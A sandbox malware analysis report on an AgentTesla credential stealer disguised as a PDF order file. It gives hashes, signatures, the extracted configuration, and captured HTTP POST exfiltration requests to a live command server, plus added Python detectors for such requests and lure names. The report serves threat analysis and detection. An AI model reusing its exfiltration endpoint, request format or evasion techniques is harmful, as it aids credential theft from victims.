Windows Analysis Report #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe

Overview

General Information

Sample Name: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Analysis ID: 528513
MD5: 7fb080a6aa45b1ac87c003e3f84a2983
SHA1: fa4a0744b0b1282e3f3c167773abcd50e806c133
SHA256: a1e613cf9bd9b9afbd51f0c2173cb71ddfdfecdc480b4dc8fc7571a41c90100d
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
Multi AV Scanner detection for domain / URL
Source: mgbless.in Virustotal: Detection: 5%
Source: www.mgbless.in Virustotal: Detection: 7%
Source: http://www.mgbless.in Virustotal: Detection: 7%
Source: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php Virustotal: Detection: 8%
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack Avira: Label: TR/Spy.Gen8
Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.223.93.105
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: www.mgbless.in | Content-Length: 366 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: www.mgbless.in | Content-Length: 362 | Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: www.mgbless.in | Content-Length: 376 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: http://OcJtmX.com
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.917580598.00000000064F8000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmp String found in binary or memory: http://mgbless.in
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmp String found in binary or memory: http://www.mgbless.in
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916704934.0000000002DFB000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in4Xl
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in4XlLm
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.inD8Xl47
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: www.mgbless.in | Content-Length: 366 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: www.mgbless.in
Source: unknown HTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2
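The three POSTs recorded above share one header set: a Firefox 80 User-Agent, a form-encoded body of a few hundred bytes, a bare .php path, and Expect: 100-continue. That last header is what .NET's HttpWebRequest adds to POSTs by default, and mainstream browsers do not send it; a real browser would also send Accept, Accept-Language and Accept-Encoding, none of which appear in the capture. The following Python is an added example, not part of the sandbox report: it parses a request head and scores it on those indicators. The request texts are constructed from the headers shown in this report (the benign contrast request is invented), and the score threshold is an assumption.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the exfiltration request as captured in this report,
# with the header lines restored to one per line.
SAMPLE_REQUEST = (
    "POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.mgbless.in\r\n"
    "Content-Length: 366\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed contrast: a form POST as a real Firefox would send it.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0\r\n"
    "Accept: text/html,application/xhtml+xml,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 42\r\n"
    "\r\n"
)


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # header names lower-cased


def parse_request(raw: str) -> Request:
    """Parse the request line and headers of a raw HTTP/1.x request head."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


BROWSER_UA = re.compile(r"Firefox/|Chrome/|Safari/|Edg/")
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding")


def exfil_indicators(req: Request) -> list:
    """Reasons this request looks like a non-browser client wearing a browser User-Agent."""
    reasons = []
    claims_browser = bool(BROWSER_UA.search(req.headers.get("user-agent", "")))
    if claims_browser and not any(h in req.headers for h in BROWSER_HEADERS):
        reasons.append("browser User-Agent but no Accept/Accept-Language/Accept-Encoding")
    # .NET HttpWebRequest adds Expect: 100-continue to POSTs by default;
    # Firefox and Chrome do not send it.
    if claims_browser and req.headers.get("expect", "").lower() == "100-continue":
        reasons.append("Expect: 100-continue under a browser User-Agent (.NET HttpWebRequest default)")
    form = req.headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    if req.method == "POST" and form and req.path.lower().endswith(".php"):
        reasons.append("form-encoded POST straight to a .php script")
    try:
        length = int(req.headers.get("content-length", "0"))
    except ValueError:
        length = 0
    if req.method == "POST" and 0 < length < 1024:
        reasons.append("small POST body (%d bytes), typical of a beacon or credential drop" % length)
    return reasons


def is_suspected_exfil(raw: str, threshold: int = 3) -> bool:
    """Threshold is an assumption: the captured request scores 4, the benign one 1."""
    return len(exfil_indicators(parse_request(raw))) >= threshold
```

The Content-Length values in the three captures (362, 366, 376) differ by a few bytes, which is what a fixed-format beacon with a timestamp or counter looks like; the check on body size is deliberately loose so that it only adds weight when the header anomalies are already present.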

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
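The sandbox writes non-ASCII characters in file names as "#Uxxxx", so "#U56de#U8986" is 回覆 ("reply"), and the full lure name is "回覆 Picture for ORDER AFF21-19810,pdf.exe": a business keyword, a fake document extension separated by a comma, and an .exe at the end. The following Python is an added example, not part of the report: it decodes that escape form and lists the reasons a name looks like a disguised executable. The keyword and extension lists are assumptions chosen for illustration.

```python
import re
import unicodedata

# Joe Sandbox writes non-ASCII characters in file names as "#Uxxxx" (hex code point).
_JOE_ESCAPE = re.compile(r"#U([0-9A-Fa-f]{4})")


def decode_joe_name(name: str) -> str:
    """Turn '#U56de#U8986 Picture ...' back into the original characters."""
    return _JOE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), name)


# Extensions a lure pretends to have, and extensions Windows will actually run (assumed lists).
DOC_TOKENS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt", "zip"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "hta"}
LURE_WORDS = re.compile(r"\b(order|invoice|payment|po|quotation|receipt|shipment|swift)\b")
# Whitespace padding, zero-width characters and bidi overrides used to hide the real extension.
HIDDEN_CHARS = re.compile(r"\s{2,}|[\u200b-\u200f\u202a-\u202e]")


def lure_indicators(name: str) -> list:
    """Reasons a file name looks like an executable disguised as a document."""
    decoded = decode_joe_name(name)
    lower = decoded.lower()
    reasons = []
    ext = lower.rsplit(".", 1)[-1] if "." in lower else ""
    if ext in EXEC_EXTS:
        stem = lower[: -(len(ext) + 1)]
        # Matches "invoice.pdf.exe", "invoice,pdf.exe", "invoice pdf.exe", "invoice_pdf.exe".
        m = re.search(r"[.,_ -]([a-z0-9]{2,4})$", stem)
        if m and m.group(1) in DOC_TOKENS:
            reasons.append("document extension '%s' in front of executable extension '%s'"
                           % (m.group(1), ext))
        if LURE_WORDS.search(stem):
            reasons.append("business-lure keyword in name")
    non_ascii = [c for c in decoded if ord(c) > 127]
    if non_ascii:
        # First word of the Unicode name is a rough script label (CJK, CYRILLIC, ARABIC, ...).
        scripts = sorted({unicodedata.name(c, "?").split()[0] for c in non_ascii})
        reasons.append("non-ASCII characters (%s)" % ", ".join(scripts))
    if HIDDEN_CHARS.search(decoded):
        reasons.append("whitespace padding or zero-width/bidi control characters")
    return reasons
```

Run on this report's sample name the function returns three reasons (fake pdf extension, ORDER keyword, CJK characters); a right-to-left-override name such as "photo\u202egpj.exe" is caught by the control-character check even though the visible extension looks harmless.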
.NET source code contains very large array initializations
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, <PrivateImplementationDetails>{9AE5D3B4-2635-4821-844A-98E2A33766C9}/CD5F680C-BDE0-494B-B19F-D0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, <PrivateImplementationDetails>{9AE5D3B4-2635-4821-844A-98E2A33766C9}/CD5F680C-BDE0-494B-B19F-D0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, <PrivateImplementationDetails>{9AE5D3B4-2635-4821-844A-98E2A33766C9}/CD5F680C-BDE0-494B-B19F-D0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, <PrivateImplementationDetails>{9AE5D3B4-2635-4821-844A-98E2A33766C9}/CD5F680C-BDE0-494B-B19F-D0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Uses 32bit PE files
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_01698250
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_0169D2E8
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E13C20
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E19D18
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E11270
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E133B8
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E1AB94
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E4B838
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E467C0
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_011646A0
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_0116465F
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_0116467F
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_0116DA00
Sample file is different than original file name gathered from version info
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Binary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.663674311.0000000006710000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915352748.0000000000438000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915560272.0000000000CF8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Binary or memory string: OriginalFilenameDebugg.exe. vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe:Zone.Identifier
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe "C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe"
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.log
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@6/2
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\zvjPHYm
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addbook.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addcustomer.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addbook.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addcustomer.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: I/Debugg;component/views/addbook.xaml_/Debugg;component/views/borrowfrombookview.xamlU/Debugg;component/views/borrowingview.xamlO/Debugg;component/views/changebook.xamlW/Debugg;component/views/changecustomer.xamlS/Debugg;component/views/customerview.xamlW/Debugg;component/views/deletecustomer.xamlM/Debugg;component/views/errorview.xamlQ/Debugg;component/views/smallextras.xamlQ/Debugg;component/views/addcustomer.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.11.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
